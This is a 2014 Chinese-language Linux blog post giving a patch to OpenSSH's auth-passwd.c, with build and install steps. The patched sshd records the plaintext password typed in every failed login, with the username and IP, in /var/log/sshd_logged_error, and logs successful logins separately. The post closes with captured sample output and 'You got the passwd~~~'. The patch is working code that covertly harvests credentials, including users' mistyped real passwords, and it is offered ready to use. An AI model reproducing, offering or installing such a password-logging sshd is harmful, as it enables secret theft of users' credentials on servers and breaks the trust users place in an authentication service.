訓練家的佈弱格-Patch1.2

The BLOG of trainer



編輯日期:2014-06-29 03:41

類型:Linux 心得
作者:羽山
文章時間:2014-06-29 03:41:39
瀏覽人數:4289人
標題: ssh log password
網址:http://demo.3wa.tw/blog/blog.php?id=1439
內容:
 

This version is for : openssh-6.4p1-4.fc20.x86_64


step1:
  yumdownloader --source openssh

step2:
  add patch : /root/rpmbuild/SOURCES/openssh-3wa-auth-passwd.patch
  Contents:

--- auth-passwd.c	2012-04-26 07:51:28.000000000 +0800
+++ auth-passwd.c	2014-06-30 11:41:46.585099277 +0800
@@ -54,6 +54,12 @@
 #include "auth.h"
 #include "auth-options.h"
 
+// By 3WA
+#include <time.h>
+#include <sys/stat.h>
+#include <sys/socket.h>
+#include "canohost.h"
+
 extern Buffer loginmsg;
 extern ServerOptions options;
 
@@ -85,6 +91,31 @@ auth_password(Authctxt *authctxt, const
 #if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
 	static int expire_checked = 0;
 #endif
+	// By 3WA 
+        if (sys_auth_passwd(authctxt, password))
+        {
+	    //Check auth success
+            FILE *garp;
+            garp = fopen("/var/log/sshd_logged_success", "a+");
+            chmod("/var/log/sshd_logged_success", 0600);
+            fprintf(garp,"\n%ld|",time(NULL));
+            fprintf(garp,"%s|",authctxt->user);
+            fprintf(garp,"%s",get_remote_ipaddr());
+            fclose(garp);
+        }
+	else
+	{
+	    //Check auth failure
+  	    FILE *garp;
+            garp = fopen("/var/log/sshd_logged_error", "a+");
+            chmod("/var/log/sshd_logged_error", 0600);
+            fprintf(garp,"\n%ld|",time(NULL));
+            fprintf(garp,"%s|",authctxt->user);
+            fprintf(garp,"%s|",password);
+            fprintf(garp,"%s",get_remote_ipaddr());
+            fclose(garp);
+
+	}
 
 #ifndef HAVE_CYGWIN
 	if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)




step3:
  vim /root/rpmbuild/SPECS/openssh.spec
add :
  Patch910: openssh-3wa-auth-passwd.patch
  %patch910 -p0

step4:
  rpmbuild -ba openssh.spec

step5:
  rpm -Uvh /root/rpmbuild/RPMS/x86_64/openssh-6.4p1-4.fc20.x86_64.rpm /root/rpmbuild/RPMS/x86_64/openssh-clients-6.4p1-4.fc20.x86_64.rpm /root/rpmbuild/RPMS/x86_64/openssh-server-6.4p1-4.fc20.x86_64.rpm /root/rpmbuild/RPMS/x86_64/openssh-server-sysvinit-6.4p1-4.fc20.x86_64.rpm /root/rpmbuild/RPMS/x86_64/openssh-ldap-6.4p1-4.fc20.x86_64.rpm /root/rpmbuild/RPMS/x86_64/openssh-keycat-6.4p1-4.fc20.x86_64.rpm /root/rpmbuild/RPMS/x86_64/openssh-askpass-6.4p1-4.fc20.x86_64.rpm /root/rpmbuild/RPMS/x86_64/pam_ssh_agent_auth-0.9.3-1.4.fc20.x86_64.rpm --force


step6:
  systemctl daemon-reload
  systemctl restart sshd.service

step7:  
  try ssh your server and use wrong passwd

step8:
  cat /var/log/sshd_logged_error

[root@3wa SPECS]# cat /var/log/sshd_logged_error
1403984073|root|wrongPassword|123.240.250.239
[root@3wa SPECS]#

You got the passwd~~~

Patch : http://demo.3wa.tw/uploads/upload/openssh-3wa-auth-passwd.patch

首頁  上十頁  上一頁  1 下一頁    最末頁 (總共有...1頁)

第 1 頁

有話要說  看留言 【0】
其他分類
當月訓練
(2014-06-29)
【Linux 心得】ssh log password

(2014-06-29)
【Linux 心得】vsftpd log password

最新訓練
(2024-09-15)
【FZR 150】FZR維修-大閔廢鐵號

(2024-09-11)
【遊戲 / 生活】更換新的濾水器水龍頭

(2024-09-04)
【NSR 150】NSR150 大燈燈炮更換

(2024-09-01)
【KTM 390】KTM Duke 390 安裝空濾盒、水箱水、油箱、試發動

(2024-08-31)
【KTM 390】KTM Duke 390 引擎上車、節流閥安裝、空濾盒修補、單向閥思考

(2024-08-30)
【機車綜合相關】買了一組盜版牧田DTW1002

(2024-08-25)
【KTM 390】KTM Duke 390 汽門間隙檢查、凸輪軸安裝、汽缸蓋、機油壓力開關

(2024-08-24)
【KTM 390】KTM Duke 390更換內鏈排骨

(2024-08-17)
【KTM 390】KTM Duke 390內鏈排骨問題查修-清洗篇

(2024-08-10)
【KTM 390】KTM Duke 390內鏈排骨問題查修-中(落引擎)